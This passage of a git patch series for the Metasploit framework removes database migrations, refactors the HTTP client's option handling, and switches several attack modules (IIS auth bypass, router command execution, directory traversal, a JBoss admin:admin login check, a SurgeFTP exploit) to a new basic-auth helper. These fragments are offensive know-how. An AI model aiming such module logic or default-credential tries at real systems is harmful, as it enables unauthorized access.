:title # Short identifier - t.text :description # Plain text or HTML (trusted) - t.text :solution # Plain text or HTML (trusted) - t.binary :proof # Should be UTF-8, but may not be, sanitize on output - # Technically this duplicates vuln.info, but that field - # is poorly managed / handled today. Eventually we will - # replace vuln.info - - # Nexpose-specific fields - t.integer :nx_console_id # NexposeConsole table reference - t.integer :nx_device_id # Reference from the Nexpose side - t.string :nx_vuln_id # 'jre-java-update-flaw' - t.float :nx_severity # 0-10 - t.float :nx_pci_severity # 0-10 - t.timestamp :nx_published # Normalized from "20081205T000000000" - t.timestamp :nx_added # Normalized from "20081205T000000000" - t.timestamp :nx_modified # Normalized from "20081205T000000000" - t.text :nx_tags # Comma separated - - end - end - - def self.down - drop_table :vuln_details - end -end diff --git a/data/sql/migrate/20120625000001_add_host_details.rb b/data/sql/migrate/20120625000001_add_host_details.rb deleted file mode 100755 index 36e70892fa..0000000000 --- a/data/sql/migrate/20120625000001_add_host_details.rb +++ /dev/null @@ -1,16 +0,0 @@ -class AddHostDetails < ActiveRecord::Migration - - def self.up - create_table :host_details do |t| - t.integer :host_id # Host table reference - - # Nexpose-specific fields - t.integer :nx_console_id # NexposeConsole table reference - t.integer :nx_device_id # Reference from the Nexpose side - end - end - - def self.down - drop_table :host_details - end -end diff --git a/data/sql/migrate/20120625000002_expand_details.rb b/data/sql/migrate/20120625000002_expand_details.rb deleted file mode 100755 index bd240ecdc5..0000000000 --- a/data/sql/migrate/20120625000002_expand_details.rb +++ /dev/null @@ -1,16 +0,0 @@ -class ExpandDetails < ActiveRecord::Migration - - def self.up - add_column :vuln_details, :nx_vuln_status, :text - add_column :vuln_details, :nx_proof_key, :text - add_column :vuln_details, :src, :string - add_column :host_details, :src, :string - end - - def self.down - remove_column :vuln_details, :nx_vuln_status - remove_column :vuln_details, :nx_proof_key - remove_column :vuln_details, :src - remove_column :host_details, :src - end -end diff --git a/data/sql/migrate/20120625000003_expand_details2.rb b/data/sql/migrate/20120625000003_expand_details2.rb deleted file mode 100755 index 4122503692..0000000000 --- a/data/sql/migrate/20120625000003_expand_details2.rb +++ /dev/null @@ -1,24 +0,0 @@ -class ExpandDetails2 < ActiveRecord::Migration - - def self.up - add_column :host_details, :nx_site_name, :string - add_column :host_details, :nx_site_importance, :string - add_column :host_details, :nx_scan_template, :string - add_column :host_details, :nx_risk_score, :float - - add_column :vuln_details, :nx_scan_id, :integer - add_column :vuln_details, :nx_vulnerable_since, :timestamp - add_column :vuln_details, :nx_pci_compliance_status, :string - end - - def self.down - remove_column :host_details, :nx_site_name - remove_column :host_details, :nx_site_importance - remove_column :host_details, :nx_scan_template - remove_column :host_details, :nx_risk_score - - remove_column :vuln_details, :nx_scan_id - remove_column :vuln_details, :nx_vulnerable_since - remove_column :vuln_details, :nx_pci_compliance_status - end -end diff --git a/data/sql/migrate/20120625000004_add_vuln_attempts.rb b/data/sql/migrate/20120625000004_add_vuln_attempts.rb deleted file mode 100755 index b943fe358f..0000000000 --- a/data/sql/migrate/20120625000004_add_vuln_attempts.rb +++ /dev/null @@ -1,19 +0,0 @@ -class AddVulnAttempts < ActiveRecord::Migration - - def self.up - create_table :vuln_attempts do |t| - t.integer :vuln_id # Vuln table reference - t.timestamp :attempted_at # Timestamp of when the session was opened or the module exited - t.boolean :exploited # Whether or not the attempt succeeded - t.string :fail_reason # Short string corresponding to a Msf::Exploit::Failure constant - t.string :username # The user that tested this vulnerability - t.text :module # The specific module name that was used - t.integer :session_id # Database identifier of any opened session - t.integer :loot_id # Database identifier of any 'proof' loot (for non-session exploits) - end - end - - def self.down - drop_table :vuln_attempts - end -end diff --git a/data/sql/migrate/20120625000005_add_vuln_and_host_counter_caches.rb b/data/sql/migrate/20120625000005_add_vuln_and_host_counter_caches.rb deleted file mode 100755 index c34101fd89..0000000000 --- a/data/sql/migrate/20120625000005_add_vuln_and_host_counter_caches.rb +++ /dev/null @@ -1,14 +0,0 @@ -class AddVulnAndHostCounterCaches < ActiveRecord::Migration - - def self.up - add_column :hosts, :host_detail_count, :integer, :default => 0 - add_column :vulns, :vuln_detail_count, :integer, :default => 0 - add_column :vulns, :vuln_attempt_count, :integer, :default => 0 - end - - def self.down - remove_column :hosts, :host_detail_count - remove_column :vulns, :vuln_detail_count - remove_column :vulns, :vuln_attempt_count - end -end diff --git a/data/sql/migrate/20120625000006_add_module_details.rb b/data/sql/migrate/20120625000006_add_module_details.rb deleted file mode 100755 index cb99f7ee84..0000000000 --- a/data/sql/migrate/20120625000006_add_module_details.rb +++ /dev/null @@ -1,118 +0,0 @@ -class AddModuleDetails < ActiveRecord::Migration - - def self.up - - create_table :module_details do |t| - t.timestamp :mtime # disk modified time - t.text :file # location on disk - t.string :mtype # exploit, auxiliary, post, etc - t.text :refname # module path (no type) - t.text :fullname # module path with type - t.text :name # module title - t.integer :rank # exploit rank - t.text :description # - t.string :license # MSF_LICENSE - t.boolean :privileged # true or false - t.timestamp :disclosure_date # Mar 10 2004 - t.integer :default_target # 0 - t.text :default_action # "scan" - t.string :stance # "passive" - t.boolean :ready # true/false - end - - add_index :module_details, :refname - add_index :module_details, :name - add_index :module_details, :description - add_index :module_details, :mtype - - create_table :module_authors do |t| - t.integer :module_detail_id - t.text :name - t.text :email - end - add_index :module_authors, :module_detail_id - - create_table :module_mixins do |t| - t.integer :module_detail_id - t.text :name - end - add_index :module_mixins, :module_detail_id - - create_table :module_targets do |t| - t.integer :module_detail_id - t.integer :index - t.text :name - end - add_index :module_targets, :module_detail_id - - create_table :module_actions do |t| - t.integer :module_detail_id - t.text :name - end - add_index :module_actions, :module_detail_id - - create_table :module_refs do |t| - t.integer :module_detail_id - t.text :name - end - add_index :module_refs, :module_detail_id - add_index :module_refs, :name - - create_table :module_archs do |t| - t.integer :module_detail_id - t.text :name - end - add_index :module_archs, :module_detail_id - - create_table :module_platforms do |t| - t.integer :module_detail_id - t.text :name - end - add_index :module_platforms, :module_detail_id - - end - - def self.down - remove_index :module_details, :refname - remove_index :module_details, :name - remove_index :module_details, :description - remove_index :module_details, :mtype - - remove_index :module_authors, :module_detail_id - remove_index :module_mixins, :module_detail_id - remove_index :module_targets, :module_detail_id - remove_index :module_actions, :module_detail_id - remove_index :module_refs, :module_detail_id - remove_index :module_refs, :name - remove_index :module_archs, :module_detail_id - remove_index :module_platform, :module_detail_id - - drop_table :module_details - drop_table :module_authors - drop_table :module_mixins - drop_table :module_targets - drop_table :module_actions - drop_table :module_refs - drop_table :module_archs - drop_table :module_platforms - - end -end - -=begin - -Mdm::Host.find_by_sql(" -SELECT - hosts.id, hosts.address, module_details.mtype AS mtype, module_details.refname AS mname, vulns.name AS vname, refs.name AS vref -FROM - hosts,vulns,vulns_refs,refs,module_refs,module_details -WHERE - hosts.id = vulns.host_id AND - vulns.id = vulns_refs.vuln_id AND - vulns_refs.ref_id = refs.id AND - refs.name = module_refs.name AND - module_refs.module_detail_id = modules_details.id -").map{|x| [x.address, x.mname, x.vname, x.vref ] } - - -=end diff --git a/data/sql/migrate/20120625000007_add_exploit_attempts.rb b/data/sql/migrate/20120625000007_add_exploit_attempts.rb deleted file mode 100755 index 22d3ec0b1f..0000000000 --- a/data/sql/migrate/20120625000007_add_exploit_attempts.rb +++ /dev/null @@ -1,26 +0,0 @@ -class AddExploitAttempts < ActiveRecord::Migration - - def self.up - create_table :exploit_attempts do |t| - t.integer :host_id # Host table reference (primary) - t.integer :service_id # Service table reference (optional) - t.integer :vuln_id # Vuln table reference (optional) - t.timestamp :attempted_at # Timestamp of when the session was opened or the module exited - t.boolean :exploited # Whether or not the attempt succeeded - t.string :fail_reason # Short string corresponding to a Msf::Exploit::Failure constant - t.string :username # The user that tested this vulnerability - t.text :module # The specific module name that was used - t.integer :session_id # Database identifier of any opened session - t.integer :loot_id # Database identifier of any 'proof' loot (for non-session exploits) - t.integer :port # Port -> Services are created/destroyed frequently and failed - t.string :proto # Protocol | attempts may be against closed ports. - end - - add_column :hosts, :exploit_attempt_count, :integer, :default => 0 - end - - def self.down - drop_table :exploit_attempts - remove_column :hosts, :exploit_attempt_count - end -end diff --git a/data/sql/migrate/20120625000008_add_fail_message.rb b/data/sql/migrate/20120625000008_add_fail_message.rb deleted file mode 100755 index 7d6dd0f96b..0000000000 --- a/data/sql/migrate/20120625000008_add_fail_message.rb +++ /dev/null @@ -1,12 +0,0 @@ -class AddFailMessage < ActiveRecord::Migration - - def self.up - add_column :vuln_attempts, :fail_detail, :text - add_column :exploit_attempts, :fail_detail, :text - end - - def self.down - remove_column :vuln_attempts, :fail_detail - remove_column :exploit_attempts, :fail_detail - end -end diff --git a/data/sql/migrate/20120718202805_add_owner_and_payload_to_web_vulns.rb b/data/sql/migrate/20120718202805_add_owner_and_payload_to_web_vulns.rb deleted file mode 100644 index 2160e61de6..0000000000 --- a/data/sql/migrate/20120718202805_add_owner_and_payload_to_web_vulns.rb +++ /dev/null @@ -1,13 +0,0 @@ -class AddOwnerAndPayloadToWebVulns < ActiveRecord::Migration - - def self.up - add_column :web_vulns, :owner, :string - add_column :web_vulns, :payload, :text - end - - def self.down - remove_column :web_vulns, :owner - remove_column :web_vulns, :payload - end - -end diff --git a/lib/msf/core/db_manager.rb b/lib/msf/core/db_manager.rb index a5bdf41fef..42974b229a 100644 --- a/lib/msf/core/db_manager.rb +++ b/lib/msf/core/db_manager.rb @@ -69,7 +69,7 @@ class DBManager self.framework = framework self.migrated = false - self.migration_paths = [ ::File.join(Msf::Config.install_root, "data", "sql", "migrate") ] + self.migration_paths = [] self.modules_cached = false self.modules_caching = false @@ -82,6 +82,10 @@ class DBManager end initialize_database_support + + # have to set migration paths after initialize_database_support as it loads + # MetasploitDataModels. + self.migration_paths << MetasploitDataModels.root.join('db', 'migrate').to_s end # From 862b8137865592b613f784edecddeeac2be2ae2b Mon Sep 17 00:00:00 2001 From: Tasos Laskos Date: Fri, 1 Mar 2013 18:33:16 +0200 Subject: [PATCH 121/139] Auxiliary::Web: fixed confidence calc in log methods --- lib/msf/core/auxiliary/web.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/msf/core/auxiliary/web.rb b/lib/msf/core/auxiliary/web.rb index 48428b720c..70c824bfcb 100644 --- a/lib/msf/core/auxiliary/web.rb +++ b/lib/msf/core/auxiliary/web.rb @@ -179,7 +179,7 @@ module Auxiliary::Web :blame => details[:blame], :category => details[:category], :description => details[:description], - :confidence => details[:category] || opts[:confidence] || 100, + :confidence => calculate_confidence( parent.vulns[mode][vhash] ), :owner => self } @@ -211,7 +211,7 @@ module Auxiliary::Web :blame => details[:blame], :category => details[:category], :description => details[:description], - :confidence => details[:category] || opts[:confidence] || 100, + :confidence => calculate_confidence( parent.vulns[mode][vhash] ), :owner => self } From 902948e5d395e244165e9d5c9e00a8e3faa97f76 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Fri, 1 Mar 2013 11:01:00 -0600 Subject: [PATCH 122/139] cleanup options --- lib/rex/proto/http/client.rb | 43 ++++------------------------ lib/rex/proto/http/client_request.rb | 3 +- 2 files changed, 8 insertions(+), 38 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 38b5c3ac2b..47fa021f4f 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -129,23 +129,12 @@ class Client # # @return [ClientRequest] def request_raw(opts={}) - opts['agent'] ||= config['agent'] - opts['data'] ||= '' - opts['uri'] ||= '/' - opts['cookie'] ||= config['cookie'] - opts['encode'] ||= false - opts['headers'] ||= config['headers'] || {} - opts['vhost'] ||= config['vhost'] - opts['method'] ||= 'GET' - opts['proto'] ||= 'HTTP' - opts['query'] ||= '' - + opts = self.config.merge(opts) + + opts['ssl'] = self.ssl opts['cgi'] = false opts['port'] = self.port - opts['basic_auth'] = opts['basic_auth'] || config['basic_auth'] || '' - opts['raw_headers'] = opts['raw_headers'] || config['raw_headers'] || '' - opts['version'] = opts['version'] || config['version'] || '1.1' - + req = ClientRequest.new(opts) end @@ -162,33 +151,13 @@ class Client # # @return [ClientRequest] def request_cgi(opts={}) - opts['agent'] ||= config['agent'] - opts['basic_auth'] ||= config['basic_auth'] || '' - opts['cookie'] ||= config['cookie'] + opts = self.config.merge(opts) + opts['ctype'] ||= 'application/x-www-form-urlencoded' - opts['data'] ||= '' - opts['encode'] ||= false - opts['headers'] ||= config['headers'] || {} - opts['method'] ||= 'GET' - opts['proto'] ||= 'HTTP' - opts['query'] ||= '' - opts['raw_headers'] ||= config['raw_headers'] || '' - opts['uri'] ||= '/' - opts['vars_get'] ||= {} - opts['vars_post'] ||= {} - opts['version'] ||= config['version'] || '1.1' - opts['vhost'] ||= config['vhost'] - opts['ssl'] = self.ssl opts['cgi'] = true opts['port'] = self.port - if opts['encode_params'] == true or opts['encode_params'].nil? - opts['encode_params'] = true - else - opts['encode_params'] = false - end - req = ClientRequest.new(opts) end diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 039d11559d..c941342fe7 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -27,6 +27,7 @@ class ClientRequest 'path_info' => '', 'port' => 80, 'proto' => 'HTTP', + 'query' => '', 'ssl' => false, 'uri' => '/', 'vars_get' => {}, @@ -38,7 +39,7 @@ class ClientRequest # Evasion options # 'encode_params' => true, - 'encode' => true, + 'encode' => false, 'uri_encode_mode' => 'hex-normal', # hex-all, hex-random, u-normal, u-random, u-all 'uri_encode_count' => 1, # integer 'uri_full_url' => false, # bool From ac65c54cc53aacd527df02057340e3f26a626c95 Mon Sep 17 00:00:00 2001 From: Tasos Laskos Date: Fri, 1 Mar 2013 19:37:41 +0200 Subject: [PATCH 123/139] Auxiliary::Web: fixed the previous confidence fix --- lib/msf/core/auxiliary/web.rb | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/lib/msf/core/auxiliary/web.rb b/lib/msf/core/auxiliary/web.rb index 70c824bfcb..36571c5ac4 100644 --- a/lib/msf/core/auxiliary/web.rb +++ b/lib/msf/core/auxiliary/web.rb @@ -179,10 +179,11 @@ module Auxiliary::Web :blame => details[:blame], :category => details[:category], :description => details[:description], - :confidence => calculate_confidence( parent.vulns[mode][vhash] ), :owner => self } + info[:confidence] = calculate_confidence( info ) + report_web_vuln( info ) print_good " FOUND(#{mode.to_s.upcase}) URL(#{location})" @@ -211,10 +212,11 @@ module Auxiliary::Web :blame => details[:blame], :category => details[:category], :description => details[:description], - :confidence => calculate_confidence( parent.vulns[mode][vhash] ), :owner => self } + info[:confidence] = calculate_confidence( info ) + report_web_vuln( info ) print_good " VULNERABLE(#{mode.to_s.upcase}) URL(#{target.to_url})" From 7b8654a71d712ecd8158659c6c939827a3a49b64 Mon Sep 17 00:00:00 2001 From: Samuel Huckins Date: Fri, 1 Mar 2013 11:41:06 -0600 Subject: [PATCH 124/139] Revert "Merge pull request #1534 from tasos-r7/bugfix/web-vuln-confidence" This reverts commit 3840ddccbce47cacb33415ad8301a4cf04fa7462, reversing changes made to e1891f08366c459701a13f545a13ce5b926e89f6. --- lib/msf/core/auxiliary/web.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/msf/core/auxiliary/web.rb b/lib/msf/core/auxiliary/web.rb index 70c824bfcb..48428b720c 100644 --- a/lib/msf/core/auxiliary/web.rb +++ b/lib/msf/core/auxiliary/web.rb @@ -179,7 +179,7 @@ module Auxiliary::Web :blame => details[:blame], :category => details[:category], :description => details[:description], - :confidence => calculate_confidence( parent.vulns[mode][vhash] ), + :confidence => details[:category] || opts[:confidence] || 100, :owner => self } @@ -211,7 +211,7 @@ module Auxiliary::Web :blame => details[:blame], :category => details[:category], :description => details[:description], - :confidence => calculate_confidence( parent.vulns[mode][vhash] ), + :confidence => details[:category] || opts[:confidence] || 100, :owner => self } From 4212c36566836d99d8bf16db5dffa7dc84013d26 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Fri, 1 Mar 2013 11:59:02 -0600 Subject: [PATCH 125/139] Fix up basic auth madness --- lib/msf/core/exploit/http/client.rb | 7 +++---- lib/rex/proto/http/client.rb | 1 - lib/rex/proto/http/client_request.rb | 6 ------ .../auxiliary/admin/http/iis_auth_bypass.rb | 2 +- .../admin/http/intersil_pass_reset.rb | 4 ++-- .../admin/http/linksys_wrt54gl_exec.rb | 4 ++-- .../admin/http/netgear_sph200d_traversal.rb | 4 ++-- modules/auxiliary/gather/xbmc_traversal.rb | 2 +- .../auxiliary/scanner/http/http_traversal.rb | 8 +++----- .../auxiliary/scanner/http/jboss_vulnscan.rb | 2 +- .../multi/http/netwin_surgeftp_exec.rb | 2 +- spec/lib/rex/proto/http/client_spec.rb | 20 ------------------- 12 files changed, 16 insertions(+), 46 deletions(-) diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb index 5d8a48891e..6769a44b9a 100644 --- a/lib/msf/core/exploit/http/client.rb +++ b/lib/msf/core/exploit/http/client.rb @@ -163,7 +163,6 @@ module Exploit::Remote::HttpClient nclient.set_config( 'vhost' => self.vhost(), 'agent' => datastore['UserAgent'], - 'basic_auth' => self.basic_auth, 'uri_encode_mode' => datastore['HTTP::uri_encode_mode'], 'uri_full_url' => datastore['HTTP::uri_full_url'], 'pad_method_uri_count' => datastore['HTTP::pad_method_uri_count'], @@ -292,9 +291,9 @@ module Exploit::Remote::HttpClient # # Combine the user/pass into an auth string for the HTTP Client # - def basic_auth - return if not datastore['USERNAME'] - datastore['USERNAME'].to_s + ":" + (datastore['PASSWORD'].to_s || '') + def basic_auth(username, password) + auth_str = Rex::Text.encode_base64("#{username}:#{password}") + "Basic #{auth_str}" end ## diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 47fa021f4f..4a8d8108f3 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -113,7 +113,6 @@ class Client # # @param opts [Hash] # @option opts 'agent' [String] User-Agent header value - # @option opts 'basic_auth' [String] Basic-Auth header value # @option opts 'connection' [String] Connection header value # @option opts 'cookie' [String] Cookie header value # @option opts 'data' [String] HTTP data (only useful with some methods, see rfc2616) diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index c941342fe7..e0cdb4946f 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -87,12 +87,6 @@ class ClientRequest def initialize(opts={}) @opts = DefaultConfig.merge(opts) - - # Backwards compatibility for wonky basic authentication api from - # the dawn of time. - if opts['basic_auth'] and not opts['authorization'] - @opts['authorization'] = "Basic #{Rex::Text.encode_base64(opts['basic_auth'])}" - end end def to_s diff --git a/modules/auxiliary/admin/http/iis_auth_bypass.rb b/modules/auxiliary/admin/http/iis_auth_bypass.rb index d900abe8e7..0e051223a7 100644 --- a/modules/auxiliary/admin/http/iis_auth_bypass.rb +++ b/modules/auxiliary/admin/http/iis_auth_bypass.rb @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi({ 'uri' => dir, 'method' => 'GET', - 'basic_auth' => "#{user}:#{pass}" + 'authorization' => basic_auth(user,pass) }) vprint_status(res.body) if res diff --git a/modules/auxiliary/admin/http/intersil_pass_reset.rb b/modules/auxiliary/admin/http/intersil_pass_reset.rb index 12934c9a0e..fb32e1f41c 100644 --- a/modules/auxiliary/admin/http/intersil_pass_reset.rb +++ b/modules/auxiliary/admin/http/intersil_pass_reset.rb @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi({ 'uri'=> uri, 'method'=>'GET', - 'basic_auth' => "#{Rex::Text.rand_text_alpha(127)}:#{datastore['PASSWORD']}" + 'authorization' => basic_auth(Rex::Text.rand_text_alpha(127),datastore['PASSWORD']) }) if res.nil? @@ -94,7 +94,7 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi({ 'uri' => uri, 'method'=> 'GET', - 'basic_auth' => "admin:#{datastore['PASSWORD']}" + 'authorization' => basic_auth('admin', datastore['PASSWORD']) }) if not res diff --git a/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb b/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb index 189f937ea1..2adf4bb5e8 100644 --- a/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb +++ b/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb @@ -90,7 +90,7 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi({ 'uri' => uri, 'method' => 'GET', - 'basic_auth' => "#{user}:#{pass}" + 'authorization' => basic_auth(user,pass) }) unless (res.kind_of? Rex::Proto::Http::Response) @@ -136,7 +136,7 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi({ 'uri' => uri, 'method' => 'POST', - 'basic_auth' => "#{user}:#{pass}", + 'authorization' => basic_auth(user,pass), #'data' => data_cmd, 'vars_post' => { diff --git a/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb b/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb index 632a991c0f..909afe5443 100644 --- a/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb +++ b/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(traversal, file), - 'basic_auth' => "#{user}:#{pass}" + 'authorization' => basic_auth(user,pass) }) if res and res.code == 200 and res.body !~ /404\ File\ Not\ Found/ @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi({ 'uri' => '/', 'method' => 'GET', - 'basic_auth' => "#{user}:#{pass}" + 'authorization' => basic_auth(user,pass) }) return :abort if res.nil? diff --git a/modules/auxiliary/gather/xbmc_traversal.rb b/modules/auxiliary/gather/xbmc_traversal.rb index 3f03554c15..a1bcb87489 100644 --- a/modules/auxiliary/gather/xbmc_traversal.rb +++ b/modules/auxiliary/gather/xbmc_traversal.rb @@ -58,7 +58,7 @@ class Metasploit3 < Msf::Auxiliary res = send_request_raw({ 'method' => 'GET', 'uri' => "/#{traversal}/#{datastore['FILEPATH']}", - 'basic_auth' => "#{datastore['USERNAME']}:#{datastore['PASSWORD']}" + 'authorization' => basic_auth(datastore['USERNAME'],datastore['PASSWORD']) }, 25) rescue Rex::ConnectionRefused print_error("#{rhost}:#{rport} Could not connect.") diff --git a/modules/auxiliary/scanner/http/http_traversal.rb b/modules/auxiliary/scanner/http/http_traversal.rb index a5f6c194f8..eedc2a72ce 100644 --- a/modules/auxiliary/scanner/http/http_traversal.rb +++ b/modules/auxiliary/scanner/http/http_traversal.rb @@ -28,8 +28,7 @@ class Metasploit3 < Msf::Auxiliary source against PHP applications. The 'WRITABLE' action can be used to determine if the trigger can be used to write files outside the www directory. - To use the 'COOKIE' option, set your value like so: "name=value". To use - the 'BASICAUTH' option, set it like this: "username:password". + To use the 'COOKIE' option, set your value like so: "name=value". }, 'Author' => [ @@ -70,8 +69,7 @@ class Metasploit3 < Msf::Auxiliary # We favor automatic OptString.new('TRIGGER', [false,'Trigger string. Ex: ../', '']), OptString.new('FILE', [false, 'Default file to read for the fuzzing stage', '']), - OptString.new('COOKIE', [false, 'Cookie value to use when sending the requests', '']), - OptString.new('BASICAUTH', [false, 'Credential to use for basic auth (Ex: admin:admin)', '']) + OptString.new('COOKIE', [false, 'Cookie value to use when sending the requests', '']) ], self.class) deregister_options('RHOST') @@ -155,7 +153,7 @@ class Metasploit3 < Msf::Auxiliary req['uri'] = this_path req['headers'] = {'Cookie'=>datastore['COOKIE']} if not datastore['COOKIE'].empty? req['data'] = datastore['DATA'] if not datastore['DATA'].empty? - req['basic_auth'] = datastore['BASICAUTH'] if not datastore['BASICAUTH'].empty? + req['authorization'] = basic_auth(datastore['USERNAME'], datastore['PASSWORD']) return req end diff --git a/modules/auxiliary/scanner/http/jboss_vulnscan.rb b/modules/auxiliary/scanner/http/jboss_vulnscan.rb index d6dc7c3638..41f5566772 100644 --- a/modules/auxiliary/scanner/http/jboss_vulnscan.rb +++ b/modules/auxiliary/scanner/http/jboss_vulnscan.rb @@ -129,7 +129,7 @@ class Metasploit3 < Msf::Auxiliary 'uri' => app, 'method' => 'GET', 'ctype' => 'text/plain', - 'basic_auth' => 'admin:admin' + 'authorization' => basic_auth('admin','admin') }, 20) if (res and res.code == 200) print_good("#{rhost}:#{rport} Authenticated using admin:admin") diff --git a/modules/exploits/multi/http/netwin_surgeftp_exec.rb b/modules/exploits/multi/http/netwin_surgeftp_exec.rb index b546de063f..cbddcb1930 100644 --- a/modules/exploits/multi/http/netwin_surgeftp_exec.rb +++ b/modules/exploits/multi/http/netwin_surgeftp_exec.rb @@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote { 'uri' => '/cgi/surgeftpmgr.cgi', 'method' => 'POST', - 'basic_auth' => datastore['USERNAME'] + ":" + datastore['PASSWORD'], + 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), 'vars_post' => { 'global_smtp' => "", diff --git a/spec/lib/rex/proto/http/client_spec.rb b/spec/lib/rex/proto/http/client_spec.rb index bb2f642e38..3ddd07d6bd 100644 --- a/spec/lib/rex/proto/http/client_spec.rb +++ b/spec/lib/rex/proto/http/client_spec.rb @@ -85,26 +85,6 @@ describe Rex::Proto::Http::Client do match.captures[0].chomp.should == base64 end end - - context "and basic_auth" do - before do - cli.set_config({"basic_auth" => "user:pass"}) - end - it "should not have two Authorization headers" do - req = cli.request_cgi - match = req.to_s.match("Authorization: Basic") - match.should be - match.length.should == 1 - end - it "should prefer basic_auth" do - req = cli.request_cgi - match = req.to_s.match(/Authorization: Basic (.*)$/) - match.should be - match.captures.length.should == 1 - match.captures[0].chomp.should == base64 - end - end - end it "should attempt to connect to a server" do From 99a8ec593bb03d4388865aec4c11b51b3ce10a03 Mon Sep 17 00:00:00 2001 From: Tasos Laskos Date: Fri, 1 Mar 2013 20:21:02 +0200 Subject: [PATCH 126/139] Fixing merge conflicts --- lib/msf/core/auxiliary/web.rb | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/lib/msf/core/auxiliary/web.rb b/lib/msf/core/auxiliary/web.rb index 48428b720c..3c83af5f9a 100644 --- a/lib/msf/core/auxiliary/web.rb +++ b/lib/msf/core/auxiliary/web.rb @@ -179,10 +179,11 @@ module Auxiliary::Web :blame => details[:blame], :category => details[:category], :description => details[:description], - :confidence => details[:category] || opts[:confidence] || 100, :owner => self } + info[:confidence] = calculate_confidence( info ) + report_web_vuln( info ) print_good " FOUND(#{mode.to_s.upcase}) URL(#{location})" @@ -211,10 +212,11 @@ module Auxiliary::Web :blame => details[:blame], :category => details[:category], :description => details[:description], - :confidence => details[:category] || opts[:confidence] || 100, :owner => self } + info[:confidence] = calculate_confidence( info ) + report_web_vuln( info ) print_good " VULNERABLE(#{mode.to_s.upcase}) URL(#{target.to_url})" @@ -278,7 +280,7 @@ module Auxiliary::Web report_web_vuln( info ) print_good " VULNERABLE(#{mode.to_s.upcase}) URL(#{target.to_url})" + - " PARAMETER(#{element.altered}) VALUES(#{element.params})" + " PARAMETER(#{element.altered}) VALUES(#{element.params})" print_good " PROOF(#{proof})" end From bd8f94c43dac3eb9a81edcce85e47bbe183093f1 Mon Sep 17 00:00:00 2001 From: Luke Imhoff Date: Fri, 1 Mar 2013 13:44:52 -0600 Subject: [PATCH 127/139] Update to master tag of 0.5.1 of metasploit_data_models [#44034071] --- Gemfile.lock | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 6ac57f60f6..983117cbb4 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,6 +1,6 @@ GIT remote: git://github.com/rapid7/metasploit_data_models.git - revision: a56276f8f6d1f2d532c03d2900537cadf94e1411 + revision: 1e3e0c2effb8e1bb6cec9683b830e4244babf706 tag: 0.5.1 specs: metasploit_data_models (0.5.1) @@ -12,22 +12,22 @@ GIT GEM remote: http://rubygems.org/ specs: - activemodel (3.2.11) - activesupport (= 3.2.11) + activemodel (3.2.12) + activesupport (= 3.2.12) builder (~> 3.0.0) - activerecord (3.2.11) - activemodel (= 3.2.11) - activesupport (= 3.2.11) + activerecord (3.2.12) + activemodel (= 3.2.12) + activesupport (= 3.2.12) arel (~> 3.0.2) tzinfo (~> 0.3.29) - activesupport (3.2.11) + activesupport (3.2.12) i18n (~> 0.6) multi_json (~> 1.0) arel (3.0.2) builder (3.0.4) coderay (1.0.9) diff-lcs (1.1.3) - i18n (0.6.1) + i18n (0.6.4) json (1.7.7) method_source (0.8.1) msgpack (0.5.2) From b855bd3f3affb2074b44326d94ab6c4e5edc6374 Mon Sep 17 00:00:00 2001 From: Luke Imhoff Date: Fri, 1 Mar 2013 14:06:58 -0600 Subject: [PATCH 128/139] Add metasploit_data_models 0.5.1 to gemcache [#44034071] --- .../gems/metasploit_data_models-0.4.0/Gemfile | 10 - .../metasploit_data_models-0.4.0/Rakefile | 7 - .../app/models/mdm/web_vuln.rb | 16 - .../lib/metasploit_data_models/version.rb | 7 - .../.gitignore | 10 +- .../.rspec | 0 .../metasploit_data_models-0.5.1/.simplecov | 38 ++ .../metasploit_data_models-0.5.1/.yardopts | 4 + .../gems/metasploit_data_models-0.5.1/Gemfile | 22 + .../LICENSE | 0 .../README.md | 0 .../metasploit_data_models-0.5.1/Rakefile | 20 + .../app/models/mdm/api_key.rb | 0 .../app/models/mdm/client.rb | 0 .../app/models/mdm/cred.rb | 0 .../app/models/mdm/event.rb | 0 .../app/models/mdm/exploit_attempt.rb | 0 .../app/models/mdm/exploited_host.rb | 0 .../app/models/mdm/host.rb | 0 